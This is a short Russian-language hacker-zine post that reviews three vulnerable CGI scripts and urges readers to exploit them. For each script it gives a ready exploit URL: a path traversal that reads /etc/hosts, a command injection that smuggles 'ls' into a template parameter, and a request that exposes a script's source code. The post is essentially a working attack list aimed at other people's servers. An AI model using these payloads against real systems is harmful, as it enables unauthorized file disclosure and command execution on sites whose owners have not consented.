Привет. Соскучились? Ну вот мой свежий обзор новых cgi багов. Что
меня больше всего удивляет, так это то, что не смотря на общеизвестные методы взлома cgi скриптов, программеры продолжают писать проги к которым эти методы применимы...
Название: parsetemplate.cgi
Уязвимость: Скрипт позволяет просматривать
некоторые файлы на диске жертвы.
Эксплоит: parsetemplate.cgi?template=/../etc/hosts
Название: at_birta.cgi
Уязвимость: C помощью этого скрипта ты сможешь просматривать
содержание директорий на сервере
Эксплоит: at_birta.cgi?&template=;ls|
Следующая уязвимость в скрипте не даст вам возможности смотреть файлы или директории на сайтах, но вы сможете получить
исходный код скрипта и тем самым узнать значения
некоторых интересующих вас переменных.
Название: www_protect.pl
Эксплоит: www_protect.pl?file=/
На сегодня все.Чеши свой волосатый животик и думай как этим
воспользоваться.
